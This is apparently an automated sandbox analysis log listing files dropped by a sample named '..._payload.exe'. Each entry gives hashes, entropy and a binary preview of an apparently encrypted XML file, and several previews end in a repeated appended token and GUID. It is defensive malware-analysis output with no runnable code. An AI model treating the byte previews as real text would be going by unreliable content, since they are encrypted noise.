                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2318
                                                                                                Entropy (8bit):7.9140555191862525
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:As/iHWaYb+eZeES3G8d5slRL96AWV2KPRnYVE3Wcdb8Fvkv5MgLLD:As/9aYv58sv96AWII3W2b6kv5/
                                                                                                MD5:7CAE31C6DD39781F75B11D94EDED1B74
                                                                                                SHA1:E2F3CDBBE48F3B9F749720D3B1F714F651684B71
                                                                                                SHA-256:AB44F536B5F3BA44D982E9B3EE82B5AB9FCED4EB62162F01AB42204AEC0D792D
                                                                                                SHA-512:ADC7572E250C6E62B71BEAC79FAE614A3FC32F3DC2E5508BC9B6A5233B553DE8D106E18D53000247080D3E888B3C970BD201484D5A26BFA1BE1F285B01EB80B9
                                                                                                Malicious:false
                                                                                                Preview:<?xmlL..=)J..M. ...... g...+..u1..6..~q.i.g*....!.3fV......9...u.Pf.$..T.Z..+..b....r.;R...,k.....H.\..a1....n.p2kS.!...f....f.q.k.0!.Dx..s.b4.b..<4.B.(..<+.j....=B?.r.g.K..7.....X..rb.Tafb_..@e..+&A:.%.J0..^&o..&q.z....m...Z..tF.".,N...p...P_[4.8..R .W..5/...B.5.S-..x.U-...............IW.5..1a;<...%.../.SxJ..+.....~Rc...2...7..6V....\.U.p.}=.:..Ba....3.U"].e....X|...n(D..f.F..@L.(....a..+.]....6...........m.....>..q.r.,.Lh.`7.........dT'Z..gk/..:..j2,m.d .w...6G..Ib(..#S...QK...D2:y..........L..!.].....Z..2....v.1.x."m..b.D..[grNZC.m.. +G.w..3..G%.).)..}..<.E.9\..|.W..........hv.-..6..9$'5OK/......yu...\E<b...kRTn.J..q..-@M.5..(_...34..X5..m.w.Z...T...jOq.!.:u.^...{3M.....>.oH...PD.$m.T(+..=$...x.F..@.,x....6........u?.X0`....K. ..wh_......I]......!(.]...h.vg~......w.......C...1\........._!b.}.....~...[<q...;b..G....=O...W......"...]...s.".t<.......N......n...2...C............0.".&8p...Y.&.....xj....IR.....E..C....3....B.|]p.5.Y/......b..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2388
                                                                                                Entropy (8bit):7.919922371239443
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:N0RU4gXVdZMydZUkQNxPUF4BRrPGrE9FCs9uCScpikCFuHForwLD:26XVv7UkQLnIorCsurcpikCFGP
                                                                                                MD5:C7DCAE1A8DF8DBBAF323C9E384ABB7D2
                                                                                                SHA1:9696BFC336B8BA73DA52B8D91F96ADA8722852B1
                                                                                                SHA-256:05CF68C33C4C63E2D4856DE7092AD8CACBC80C25B8090D3D049547FC4CA4E823
                                                                                                SHA-512:6B40E709DDFD0CFA1B95AE64ED9039BC8091E531681E62B2B8AB863E7C8D9CF6A151761BED7A51303623BA95B992EFE888A995A20214F18479E104CB6764F7AD
                                                                                                Malicious:false
                                                                                                Preview:<?xml..]56N8..pM*...?].=.A..3..S......bNf.b{....~.j...ng........CQ .......J?.C...#.9]..^..6#N.H+Nr......&q!..v..\Z.TIo...W......j.A..m..e.A;...c.6..v..q..j....5..t..WotIG..~.W..4.....)...:y<O..%..k.....E.+s..> ..!5d..%..RA........>....~.k...hi..VJ@]....G......~.!..z`..e(.....?^.X.dE.....J.7.*...,.......M.r...E.Z....5...9.=`n.Bz.g.D.K....')..F....g..".d..`.7n.&O[....@.Z.5.&.T.V...<OR.....5gB=.R*t.K.k.... ..c.G6.....4..._...[i..].08...z.].A..u...Q. w...m;...v.. .".o.{.\.9|..!$.oQ.....>.......?......k...C.I...U.........W|3..O'ocZ..g..I..v*O....K...D..........}..&.;m..."#(p.....!...........e....M.D.....].........Q..|z*\h.l.74+..W"..^.&$...c.U["Y...3ow......u....%...e..<.0..pO4.G5.....q..e'..i|..1!c......P=...3..o.lz?.[$.x. ...Hz...U.]4V3.....$.m....0......N..'..'.b!o...C..3._.Z...:4..a8....d.$L".....D..n`1mX....'..b..........5. ....6[+De..[....:....,t..w...........b.p...[g.c,2...s!<.H.c.%.r..v....W.. #E.q.@G..c.)E..+..M....5E._...3.;.].*..I..fvM..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1197
                                                                                                Entropy (8bit):7.856267923755002
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:9X+TqwknzOJ2p4OXi9dzpiE/vrS/p6Cl6UbMbzpUMV2jx3bD:9OTqwA++ifAgk6CgUbMbz09LD
                                                                                                MD5:D8DABE92F472CA0669505B78596A2BCD
                                                                                                SHA1:C51D6456C7168F15239DC3F71F48D3E287D35B29
                                                                                                SHA-256:FED759E3BAF839ED4616E694F9667569A3CF9D0C7B27B8026E2177B054D46707
                                                                                                SHA-512:0156D94D2F5FF928161CE13BE195AB47882EA83C1DECA98D8CE7F4B511526E33420597D87DE654B516683186EE3942B40DED1C7ACE7738B921717C7B9EF17A9A
                                                                                                Malicious:false
                                                                                                Preview:<?xmlq...J......O...S...7.....z......z.$.7?...g..E..F....e ....9n.l)#...Ao78|.]..f/e_..X..k74JB......la.%..L\..+.2].*y]..\c3... ..$...?..pi._.r.no..?...6..p=z..^Kw$.....w......^..tM...*\..o.....t...V'_..}1}."Qf........d...pQy.9h....[.:.`....<q.............s.KS.F..0F.>......o.c?....:nx\v........5..w8]....[.*,1...R..y.xs...".w'..../~.(...K%y.e.p.+X..:v.-.bEN...Q.*T.]n......e^.............%P{..|Y...w<..H...T.V..|{...mG...B..C=....8....g....'18...H6&..._....;.y...0pe.....6......c<...F....q...g...........s'..`s.q. -......L-..W.a..5m..........9V.#.._..n......)..X.5;.]....E...!i3L..#X..{..?.1{=w.{t8z.C.b........J.....I..s...o!.b..>..GX....w.M4...=...8. .'...............G>A`3..P`.T$...9........D{#.yz.I.8k9.D ...E75..w...L...Q....f.J...H.|MY......V@."x.Q...Z...R....Y.m......$.....U..Oj.....). ....*m&X#fC..W.-......]..#8.....'.S!..bi..h.............q..w.....&...v!..........,...A......"..%dj*.{d/....\..+"..O-C.W..u.......S.{...y.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):771
                                                                                                Entropy (8bit):7.678709697435537
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:Pdk4SBoc6/slvqZ+ej5Us4Okf4Se5fHDuT6wkNmE6KiiNOh2r1IGgJc3cii9a:lpSddl4+ejN4OkfkfHCT67xiEZNx3bD
                                                                                                MD5:852B7F15B1F61005FC9216C1B16C82BB
                                                                                                SHA1:2EE03F05162D2E60E5E0FC039CFE08BE43922A18
                                                                                                SHA-256:C327359F7CD46AD377CD5B9329A048A7C43E22994C3B88E87FDBE67CCAE6BD11
                                                                                                SHA-512:D720872E8C1259828E71AABE8EEDA13B2D2EEF8BBA65CD2F2347D4308DE71410A1C38AF53C6C889ED17CBB40BFB4C7102B7DBA2D74545BD8E3C18AF29EFE123D
                                                                                                Malicious:false
                                                                                                Preview:<?xml?...6w...o..9b7|~...n*0...].-..j./.1A........f...!J.U'...u...~6D?...`.....l.....w@..`.....3..Y.}..;...@_W..|(w\.[...B......m.5bTOVIz..NXw.s.....6L.^.i..Z..u.T..{......ab.Bm.0.9.1U"Hf.+....&w.9^..v.....-.p....."s.e.>.bw..E.!\#..:.-.....g.ER.E.V..`..E..S.g...H..y../........1.tn.......o.V4.v.......s.9~..T.ie....u.V...L...N.!@...%..]=$....p5J..|-..+.{...J..zH..XL....m.$...x+N....sO.....U.`|.{.1...R..af.H.......M.....K.`.?.m-(..mN<...!"XCA.F'9.Zx....B,...-.i.7......Z...V......g...M.>.i.I.o.sK....X.HJ...R.P.F...V2.\.o.q.4.v..2i...e..U...Q.D.. `.k.s......4.........v.9@.D...R....r...1......{..1...f....m%<J.H......x.....r~y...5..7u.&i.*y`...6.Tr..7y..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):863
                                                                                                Entropy (8bit):7.718975998531366
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Fm3o6v2i+wJzxLDBG89gRtzjww1hO0aVx3bD:2o6JfJzrG89WtdM0GLD
                                                                                                MD5:783921873188631330D1E445D60E6D4F
                                                                                                SHA1:7F2CA297375FA0F7AA9E4D1A038E73A173198B50
                                                                                                SHA-256:A7CD6087449AC9B95B4800849F9AB079C373A9919127FE611ECF1F0F70791B98
                                                                                                SHA-512:6EAE6A6F390D6D4E845CCF4D1E2A21E30F38BA0E37D1CCE3E69B71BCCBE97BFAF942DB26CAB496D3E8171A3840F48EFEF01ABFF682F3F0172969C9573A700647
                                                                                                Malicious:false
                                                                                                Preview:<?xml...r...7f..3\6.../..D.[...e .(_-......L..7..,..y}.k....y&.,p.0*.w2.:..7d0..'.U.cQu3*.Q.o..q...%../..YX.(.(cX/....f.'YwS0..M.&n.9.....E....Nlw.....v..I.i.6E{.?.l.._...............j.4...[..G9..Q.7H..W.!.n.pNY.G..g.@RY..>...Q.-...R..<.d.b..m.5.....9#...d..*9L.....Gc....l...f....i...!...S..}.n.S.K.J...M.7#.4rH9..BTo..<...|...h<E...Y..yj....~..H....Bo..j%~.Y.v.......Z..X....'....r~.,H......-....B.-.G..n...n.3...;.m..[...7Pe;9.{........2....~..!}.e..=......E..0.J_..D...ylS.....g0....Hzl.0...L.(*..%.d........(...;:t...|ty.Ic.!....1......f.B~...g...g..B.*..%..6.Y..8.jV...A.wmOj.?.#..<.._.. .|:.m.(.....H.?.....L..Hw:..]..;.]..Dd.&.f....3..!pk......5%.<P.+]..<.V.(..H......'..... ..t......S. s.9.@}d.....s.u@.#P.z.L...a..=..F.8...i.3...)..uN23....].S>BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2604
                                                                                                Entropy (8bit):7.9256782010601015
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:I83k9vcRDOdCCiZPQcJ9Hr0vL6K/NHYtE8U1XTrhAelz+OYf/LD:IV9vclOQCQdj0RFHt8UrAel5c
                                                                                                MD5:A189ECC731315FE4526EF03DC4EEF8EA
                                                                                                SHA1:EFCB1BFC04D55386FE6F92D86EF9F2A540ECD843
                                                                                                SHA-256:4714300DBC080BB132986ED3BFECD93C1FDB8B0ADF4CF2BB96C1D8C162C01F39
                                                                                                SHA-512:3969E13FF635773B9DEF1732E32221DACAA7D977C78D1227A16EB3A7D79AA6E91480E84030D3C1A106C239A871EFC61B17D77E382D83AAB8DC01241DA5BA4300
                                                                                                Malicious:false
                                                                                                Preview:<?xml.j.(U....r.s.Xf..R.m.#. ..".RH;.d.b.N.I2>b{4.........HxB.0J.k....:k....4.5cs`g.6i1%-Q.....;..p....C..Zz..)...|3.>. M.....zA....*;..h.M..bx<.lv.&.m.U....x]@.......;n...J4........2.."..#..,'.......B..-8FA.|k..-.b.......|;#.......81Z...e.._.q.iq..:.$~Ae...(.........h....s..D...t......A...,.Sr..v.O.J.u..C.c.C.|.!9...j.'D......L&.*UV.c.o.].S...H..8w.. .!.R....Nx......g......A..7o...u.P...j.J.>.WD0...0 F..K@H..),.......e.. AL.i...*u..)........`5:E.......Q.....................A.....8m..)............-....qp....u.r#.m'(q...z..}.:.F..Bf,..A..=..l.Zb7E...U..PB.....y..8.w,....6+...c...}...iY.[..Ou.Ae..f.=...ma;../.A..u.6.bi.3I0....b.m5...H.I.:..d9it..k...]..3....5.[8.~i."..R.mn..%...4..Ro.}.]...@..;....0..s'..{I..s..l{`..$p#!......pm./..!.....w.'9.<.f..|......s.....a..[..i.B..)...}......$....i...s.2.~..Rs....|.S/)..".c.6.>O.....xH1j.. u..qJv..L.:. 4.$....:.<.R._....h..q..8.."........../.......o...#F/.>l..h;..h.......U.l..'.Z&tj.Y...K.{.Q/0YA....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6109
                                                                                                Entropy (8bit):7.974103155348224
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/nMMMEDrOlKIy70+M39cu8qGAkgDyt+jPePygo2B4tmqjqrZOFLuwv4V29E7:vMMAKzQn39cdqHxx2B4tmNGLDAV4E7
                                                                                                MD5:FD30BC6C6DA2F0782997B197075C2568
                                                                                                SHA1:1F6DD6BC693548EFE09EB742863B14ED33C184F5
                                                                                                SHA-256:118F0A0C0C3091A7104FA4C64E8478AC8D2298BE994C3F63024BEBCF9862C6E7
                                                                                                SHA-512:1E68283F6C2BE33ED80D7156CDAF43E907BF3DF533B0BCAABA9586DF7442F5BA2A728C7118269C8BDC7443CA7B059A4BF58EFDAC1FD19A4B386323FFB5C7A865
                                                                                                Malicious:false
                                                                                                Preview:<?xmlW.T.q................pp....2.F..F.[..BkA.R.c+..% N$_.'..FC7U..H.U.$...._q"..t..Q..kM.....H......9..?2.K.+...WlO....DE.1l..@0,5`"gF.,.W..H~.ouM.@..N./w...u...q.\.MyNH.6j....F.f.Z...{bt....c..Z.&..i~.R[nH.MJ.;...-.{h...b.-.....1|.J1.K...8...<6.6qzV..3.a3..o7 ...M. ..X-..W...h.}.u}........)R.NK{.1#..}...........7.k<*...Z.;Z Vc..D<.......0....S.kI..<|,<....w..nm.~...J$K.g.<...._.Qw.:Z...iP...1.l6n?...r..b..j...@..*...n..&k.....T...*3..>R]t..}..$...'....@.h....L{F..o5.mF57=t..;8.FA...A........].k.6rC....\.K.Ue....P.q.1*E..;..7%...v.../.....x..%_\d.+{.*P..Ev.....f.s.u.A9eXn..i...........Ta..j..]+..]...5..V.>G7..g...x.>Fr.....J..>.`<&^....t8./7........j.,.w1$.ZL.GS.l..U6..DP.....,......./..%W.H<u.....R.GU.|...Pl...G.9.....}"..O=..,.cpdCsAm.~.A.,..{[.G..o.H.Dx}.xZ.(.. .;.....w.....#+..e..O....Q.~.)..atE......I...]..........R.|.7.......Mo=..t.uj....k.L...O{Z.|..4..D@...'.U.`<S.T.....M..4...D.~.Fx.1.>.......Z...q..............|
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1454
                                                                                                Entropy (8bit):7.867815174361982
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:B475uEu2jTf2VJnDhcwGt3Rx3FbbXgFU34lQ8n5yUmAGXljQax3bD:u75uETTwDavx3Fb0mE5AXhLD
                                                                                                MD5:90737BD68466DA3CF91DA1AB1CA0EC77
                                                                                                SHA1:FDFD6B8F4EA68173B9A09EC1EB8BDDC3F05485D2
                                                                                                SHA-256:15D9F4DC719C13D3751F138BADDF022C2EC1E8E107A7DE567D016E7F31DD4781
                                                                                                SHA-512:2EEA214E35DE95B4E4112FB6929C0ABAF71910A654C3048CC871B4BC5A33FDC07E215FB523129B0B6E24110299792556B990282B441E334F838FBFFDC591B514
                                                                                                Malicious:false
                                                                                                Preview:<?xml#..T.w.'...F!.E.JJ.9..Rn\...}..G.x.....K..sb..Y*..#.......P.....U..j.I#B.o.....sr....J.R.5..4T.Q......sx$k..g.F...t.2.........~..`....4.$/..>%..........%#.....@..?/..z.,'...e60.PG..+...............-.Rb(......Y9.6.*..8...Hb..g.....s...........{.F..~>b...!....0+..w.r?...p.U.nA:....\./.;%......BH.t`.!$w.G........M.#j.....R...4$..58..`7....$.....}.$....G.'.W.........H.h3*.K......5@-.7...Q.R....{27...\...WXA.;e}...0!............../....7...)..B.n....#......$P...s......";[.<..../.K.....+w.....#.>.g.(.{....'q.]...2d.e..N.B~.r.......v.@................J..F._t...pY.3.0z?.q..&......1.:.....{....SH.{.nxY......v..8......Wn.|.d.Q...Y..n^S}.!B.7.s=..NC......@!Ty..@....."Zi.........#\4.F(../LRx..}..{.(...u.%...[t.....;..0...YJ.j....../.x?.K4......1.........k.m#..o(T..W.`..X(|d=..^.+...\.aZ\.3.1~F........*...K.c.-.5z...p..#..s....&I[.<.>.;.*y.b......C U..g..3..G7...,...CHlR.w....(........S..._A.T....+..s.=.E!7..M8'y....Sq<+?..%h....[._...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1120
                                                                                                Entropy (8bit):7.8273375844306985
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:gx7KLXZwHgp1dYhjcLi35duGL9wVFrZoE/u4Qi+/jQRp+gl5lx3bD:g8jOq1d9OpsGL94xxBRpNvLD
                                                                                                MD5:334A4F32F8A73B892C13FEF4C5620181
                                                                                                SHA1:FFAC5D59D5D01D0B1FFDFBDB353A15E865EA6863
                                                                                                SHA-256:3C1C8ED975487A6009DB15E077D6C64F5C752DEA41A00769558DD636ED278E34
                                                                                                SHA-512:AE5963FE42BE3E01D4093C246379D1893A7D695D64B869B44E4D501FB75C74856E39C2FBF1FB7D196E4B494E7F14C9CE89159945300EFDC554B966006834BEDE
                                                                                                Malicious:false
                                                                                                Preview:<?xml.....(.r.n.ZP....~.+..f..".<X....OM'.l.UW....C.[ec............z...w..q..f....e.......d.....Wo\6..:.S...#a..R.T..k.U..2.Vn..T..},...YK..RA..+.|.e.....vpa..=.........k,b....>.T...i..?....n......{?.)....'.1eA.....@]\....s^..>.Y.e.Q.3 |..+..;..[.2!P.|..... gH';..Z..n...`.....m:._...#..p.....+}..Un|u..0{.E..%>b...Vm.!.UH....7.sQ.....&..8..iQ.F..]..i......R.r......OV]9.1.d.+.......E.n...M.....3C3Z'H.t.....j.@K~gq.....hL.Ph.b..?...K...-r.J..5=Y.._&).&....ey..$.C....r..i..GJ...$.f..j|.....X........L*)g....h...a3..Rm&~.J.q \.{Z...zQdukU.............K.{.y\Gk.I).T..?....fLq}..Zl......1p..b.;..6..\.f.<.6.dY.>,..).o.,...*S.GYPP.#...H.HR.V.w..%.....H..ktf..PAP.f.c;...X<]sW.....0Thvd..|{.....E...6l..%w+.t.../.......W....m3.....M..W....M...{...O...l.a.o.M.T..6R.E...-..3..ClE..qa.z..........b.....N&W8..Y.dlN..H.7.N.N$...mu.k.g.\.}!.O..]....a.~-..&.6..1G #...T1.1.s".../J....I..q{..y......q%jD H.j...l.._..<EDs....*.&{5a..|7.........z'...B....<.o.. r
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3678
                                                                                                Entropy (8bit):7.947939490186292
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:hnFlCey/jRTZbzDe0hp0TkkMPMa2A4OTJ8:pFEvBZVhp03MPMa2A4OF8
                                                                                                MD5:30E9F690FE2CFB98EC45CDA901F37835
                                                                                                SHA1:CB481FFDFB683D26099964F1855C1CE41593E84E
                                                                                                SHA-256:525318C9AAC4D18A451CB80DE39BA34BF5B1B66A803D07778FC5811FC0E28BE7
                                                                                                SHA-512:03DDBD8B44C8407A93C9EDB9BBF5F0ACC1FF4983424FFEB94FCA7CCC80859F3F4AA5640030860F564A3A3E0A0C0FE77F76117264AA8E0FFEFCB02B7A83A5D58C
                                                                                                Malicious:false
                                                                                                Preview:<?xml....|~Y92...p.....O.Z...%./....d:c.%....8..0.L...OI.PG.........|..[.X.S%=53...n.;..`..l.#s....%..T...p..5.J....Q..`.|.F./......X..0.].b....E.b..uH.:u.....9x\.X....#...{.J,t..."....t..J...j..i.C.qX,.Y.....l....p.K....}....f..'.i.......a.).t.}..<......B....N......L=.-...r...M...?....4.36YRE....-|...}.q..*.Y...}.Chdi.N.".#t60/.......a..H.Ev....x.%e{.l.]..........m..xk.x....i.... ..t..,K..lhg.......M...'...S...G.U.:.n...j_.W.J.U.y!...zI....7+....Z.Sh..j..}..".15-..j.+(.C ..;.........mS..m..[..].....4...$.&..qq...\}..ba.f....u.F.^.%. \Y.....@....=...I.:.....m...y.Xa........U...I..w.......]S.$.1..X.-LW+a....`X...WB....?.....}.*O....]J.H..[..).I.../}4.gMUq...n.....C..c2d.o....Uc.<......tq.I3.G.Ne|.._...\......b........)y..G..$........oq.H..Z.'.+..B>.~4q...].x@....Fpn_..k^.r...=..zO9.yX8<5../.Wl\......~..9.Y.5.....U[.. .!..f..z.9.J..$&J`P.#i=V.0.....?.iu...qY.....\...P...;....,#....w.........2.S.y....R~.H:[J...5.,..wc.yX9.mk.*E...>.N.4......D.5..#
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):961
                                                                                                Entropy (8bit):7.78067968239033
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:vUE6CECCsHRcfNeAHXr9yMdC0JaC0j9XZhcA9Us+nPNx3bD:r6CECxx+8qb/dC0ejdPxWs+PnLD
                                                                                                MD5:7C7905B59FAEA9A3A803E39E54276C33
                                                                                                SHA1:F4107DB3FB95F343BDA1052F13DBB4887585131C
                                                                                                SHA-256:37537A4CC9E8C29AFCF8CD9AB256DE4434A0B1225B5AED789BBB57806779B68A
                                                                                                SHA-512:D9AF818910B7DE4FAF8E225EE655F7D72FD5CD4527C08F825F86494FFBE48881A796E2797A948AEE8EA2D7392EE2273EA04F88E043D7F13218312FD5E22F7016
                                                                                                Malicious:false
                                                                                                Preview:<?xmlz...Ey....Q.z..v..O.w..=... .W....!`..&h....9|..t|..".P...|~M.%j...L...w..aFY.D1..E.n..[.OUf....T....}b..>W...ZM.G.......p...s..+..r$D..i..^.... G....>;.N>.v....a..5.!M..v....%.....@.b.>...r?. s.......'m..*wB.*.Z..}#o..D.h4=....rlC(J.........P....;.NZo...*..2....c*.?%..G...&....6C,.-................&...tn..7...o....8....T'.<.....rLd.N=......|...O.a.m%..a.....q-|...E.Br!.....q#.s....K.\_}..>......\.......cT.........{qI..R...F....l..b7.5.{T......"J...mE.9..&8......#...Q.....+e}...N.Z..+sV.G.6Z.&O........2..T.C..3......Y.D....H.....Q( ......\..,N;..ZCx8r.|.5#i8VZc...@..j.u...ZPe...$.....VF.......n....[...P.e.w2.2..v'..Ay`.m.".&:....K...k....d8..J..Q3.Q..v.6.....j....EQ..$,ud....."..."..D...b...Z..[.Y9..6.Jj.+..Z...a.j.....U....!.ig.....@.Ld9(jS.k...Gx...bO.;..SU....c-..$.J...m.H.W..F!7Z.u9..../.*. ....b..(^.SD.....qd.!..f::BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1191
                                                                                                Entropy (8bit):7.81341340620277
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:d8de3j7S/IxTp1S55anzHXJpuwrxjBBW1ZsUhm01vacOQpZJ0aEPh1x3bD:X7Jxl1Sanz3/tX6s+RyDQpjEPhfLD
                                                                                                MD5:8781BCA88004DD7D553D70433D74DE72
                                                                                                SHA1:70928F4B1D11837734719DE1D8AF3E03C3706A25
                                                                                                SHA-256:442EB562E03B866D32ED43BF10A3C85B9DCF053D7EE68A7D4B752A0CA15C93D9
                                                                                                SHA-512:536D894566EB543A93548B9E72E1C7B8AD17775EA15CE977E0193377FCDB273C8CB658CD0B6499F2F257D116A64A772C3F38212B12C71046A8E8BEE9E5B52B1B
                                                                                                Malicious:false
                                                                                                Preview:<?xml...y...?.;.....Ys.;,..f->.X...E..L..-..Ga.l..K....$s......o...v...j.......d.'=..D.4...h.0....s..k..FW'*.A...9.V.y.....(.g...`...WG!w.\........)7l:.$^.`.~.(../3.@.....~+.....,xY....-.........6g.Y.u.g.....l.........>$........Yf.MX.. e...V..].:.J..9.B...../f...R[.......E..V..cE?..B....f...&....>........J."..]Sg.Z6.b..........?..:...(JC.0.......Y...]t........2..@..D.R..g...DA....7....)3s:|..h..E.w}m..yjbP.E.v.Q7.u.Oz..,I._.I.!A%.Tj.(g(.X.. .......pBSl.=......n.8)p..g...D..n..0\ y...V|.....`..s..x=b.z9.o]H..+...z..pT.j..D:<.0..$.p.ry$...C>.!.kl....,.....t..Le.*..o.q..'R......P.s..^D,L........Jh.! ....M...tL...0...U..`.....1./..<.:......q.m...x.:.U..O...c-Y..k..b.u.zj..P.....3."N...L..c...I......X.yHN{]..5.."....M..'...X'L..&.f(\:..<ih..W..`.....w.\..P.s....k....{....M........F..mq...4[..+(8.."...I.;..,-....R../...Q%..Olv..&.H...T... !..v.q...G.p.@.|@.g..v..m.*.a'..6>.XV..........L..V..k..z.d..5;.8..e...C\p.}0+.'K.:x.}...Lx....|...to.{Q
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):732
                                                                                                Entropy (8bit):7.691280096362338
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:Pj2lHU4zS+Oi9DzSyABKWcGXGIsQYQWk+7WUkzjESMCUz9w0Kn3Tt1PJrCjAgJcn:r2lHYh0sKZRVhQTUkzLvUz43TtfcAx3X
                                                                                                MD5:43F1300C149BD0A453EE890577F36619
                                                                                                SHA1:9D4E95C70997C022241587AA19B4FCD4C4022BE2
                                                                                                SHA-256:AA0CFDAAA9FA67921C39CBEC75EF8C7885603F90C0941BCF3F619E21371ABC59
                                                                                                SHA-512:549B87A936F1A0A34FA2FF41094CEC17229D64F223311D5590F37AEFB542EBB47B66327E85BA7019C731699E8EFEC97E54E989A73F34E91E2C9CF145A68FA93F
                                                                                                Malicious:false
                                                                                                Preview:<?xml..NA.x mY.T.ax}....=.6....p..u..9%}Rj.#t&...C...".....+..;......q}0R.HL.P...."p..!....e."..Q..)...@.#.WC.r.j..W...I]K.OP\ ,oo..y....+.zFa3.*v.M.t.0y%q!5..............7.....M...c...n.[..%.P.../..K...."I%.aFaYl.M..Md..=....pW.[1T...o.V...I#h(X.=+..=..a... ...).............{.@..R;..26..+...v....}.O)..:...9.../.D.3#O....B.?......~&...._H....|....R._.n......2.L.....:.Bb*.1'..oD!.>.{NB.I].#......y.D.....M.8"............Iu....9|...Yn.(.......\...$[m:...iG..0....p.../..!A".H.+....Sp.@.B....`77.D.he.k.S.R..[....%S...........w|.YQ.l.@.t]..i.##......_.X,q.......9...'S...Fj.L:T....Wn..?...&...bI.].....}W3..|......U....BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3616
                                                                                                Entropy (8bit):7.947068272476743
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:6agados8jh810ZdhuObkV2YBk5jRT7l6IQAY08iZsSq9fo:bgado7asTuFcWk5ZnsB9fo
                                                                                                MD5:E1B2A46E05E9CFF6FB2024FE047A753D
                                                                                                SHA1:B2EAD83B1BD9E01EC2BDD94E26F780454AA8EB19
                                                                                                SHA-256:90599A142B89CD55850638D87FA466F970068DA31BC6095F423E1419DB737446
                                                                                                SHA-512:CA5DA2A774ACCBA2EE05B20E9831090961B066222CD2EFCA603912DD17F756E01EF875B645068BB70CE8ED70FB69EC8DD5B52423BD251C62247B9FECF1C58EE4
                                                                                                Malicious:false
